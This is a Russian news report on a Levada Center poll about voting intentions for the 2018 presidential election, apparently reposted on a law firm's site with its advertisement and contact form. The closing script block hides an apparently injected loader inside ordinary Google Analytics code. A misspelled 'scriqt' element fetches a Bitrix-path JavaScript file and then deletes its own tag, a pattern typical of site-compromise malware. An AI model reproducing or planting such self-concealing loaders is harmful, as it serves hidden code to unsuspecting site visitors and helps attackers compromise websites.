О готовности голосовать за Путина на выборах заявили 48% россиян.

О готовности голосовать за Путина на выборах заявили 48% россиян.

За Владимира Путина на выборах президента в 2018 году готовы проголосовать 48% россиян. При этом 19% россиян пока что не знают, будут ли голосовать.

При высокой явке президент Владимир Путин получил бы 48% голосов, если бы выборы состоялись в ближайшее воскресенье. Об этом свидетельствуют данные опроса Левада-центра, говорится в материале «Коммерсанта».

Лидер КПРФ Геннадий Зюганов и глава ЛДПР Владимир Жириновский получили бы по 3%, при том, что статистическая погрешность опроса 3,4%
За министра обороны Сергея Шойгу проголосовали бы 1% опрошенных. Лидер незарегистрированной Партии прогресса Алексей Навальный получил бы на выборах 1% голосов.

Почти половина россиян (42%) пока что не определились за кого будут голосовать и будут ли вообще участвовать в выборах. Так, 19% «не знают, за кого именно стали бы голосовать», 13% — уверены, что «не станут голосовать», а 10% не решили, пойдут ли на выборы.

«В этих вопросах люди обычно определяются за две недели до голосования, а пока кампания началась только для администрации президента и для партий», — приводит «Коммерсантъ» слова директора Левада-центра Льва Гудкова.

В то же время, по данным Левада-центра, лишь 22% россиян хотят, чтобы вместо Путина на выборах 2018 года победил «другой человек», 64% хотят, чтобы он «вновь был избран» президентом.

Владимир Путин пока что не заявлял о своем намерении участвовать в выборах президента. «Время созреет, я буду смотреть на то, что происходит в стране, в мире, и исходя из того, что мы сделали, исходя из того, что мы можем сделать», — сказал Путин на большой пресс-конференции в декабре 2016 года.

В январе 2017 года пресс-секретарь президента Дмитрий Песков рассказал, что надеется на участие Владимира Путина в выборах. «Как гражданин Российской Федерации я надеюсь, что он (Путин. — РБК) примет решение идти на новый срок», — заявил Песков в интервью «Би-би-си».

О своем намерении участвовать в президентских выборах уже заявили Владимир Жириновский, Алексей Навальный и лидер «Яблока» Григорий Явлинский.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');